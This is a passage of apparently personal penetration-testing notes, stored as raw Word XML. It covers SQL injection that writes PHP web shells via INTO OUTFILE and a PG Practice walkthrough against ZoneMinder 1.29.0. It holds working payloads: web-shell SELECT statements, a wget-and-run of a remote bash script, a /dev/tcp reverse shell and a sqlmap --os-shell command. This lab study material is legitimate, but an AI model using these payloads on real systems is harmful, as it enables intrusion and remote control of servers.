        <w:t xml:space="preserve">If there were 2 columns in original SELECT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT '&lt;?php echo system($_REQUEST["cmd"]); ?&gt;',</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> INTO OUTFILE '/srv/http/cmd.php' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there were 3 columns in original SELECT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT '&lt;?php echo system($_REQUEST["cmd"]); ?&gt;',</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL,NULL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> INTO OUTFILE '/srv/http/cmd.php' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you would have to change path:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="650"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows pathing: double backslashes: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\\inetpub\\wwwroot\\cmd.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They knew it was vulnerable to SQL injection since they had source code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="322" name="image334.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image334.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48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7A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See, no sanitization, so it was easy to inject SQL commands </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b36pa5tkbhhu" w:id="196"/>
      <w:bookmarkEnd w:id="196"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading web shell through sql injection (through command injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId482">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pebbles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we ran into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMS ZoneMinder v.1.29.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which had a SQL injection and other stuff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1418"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId483">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/41239</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But in the writeup above, they manually did the SQL injection. It was a blind SQL injection </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHICH WAS ALSO COMMAND INJECTION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. That is why there is no quote escaping at the start of the payload. But for most sql injections, it you will need a UNION-based payload to escape the first SELECT that is embedded into source code. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they ran this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT "&lt;?php system($_GET['cmd']);?&gt;" INTO OUTFILE "/var/www/html/webshell.php"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They assumed the root directory was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but in general, if you have access to phpinfo.php, look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$_SERVER['DOCUMENT_ROOT'] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for root directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:hyperlink r:id="rId484">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">reddit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post, they said that they transferred webshell as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget 192.168.45.232/bash.sh -O /tmp/bash.sh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then ran it:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash /tmp/bash.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And their payload was this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/&lt;IP&gt;/&lt;PORT&gt; 0&gt;&amp;1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But the weird thing is that you had to access it from the port 3305 webpage and not the port 80 one which was vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId485">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uses sqlmap instead, which is really long, but it gives you root shell. And then you can make it send a rev shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap http://192.168.168.52:8080/zm/index.php --data="view=request&amp;request=log&amp;task=query&amp;limit=100&amp;minTime=5" --os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wbwm8wd1v0zi" w:id="197"/>
      <w:bookmarkEnd w:id="197"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading web shell with PostgreSQL (never tested)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from chatGPT and I never tested this so idk if it works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
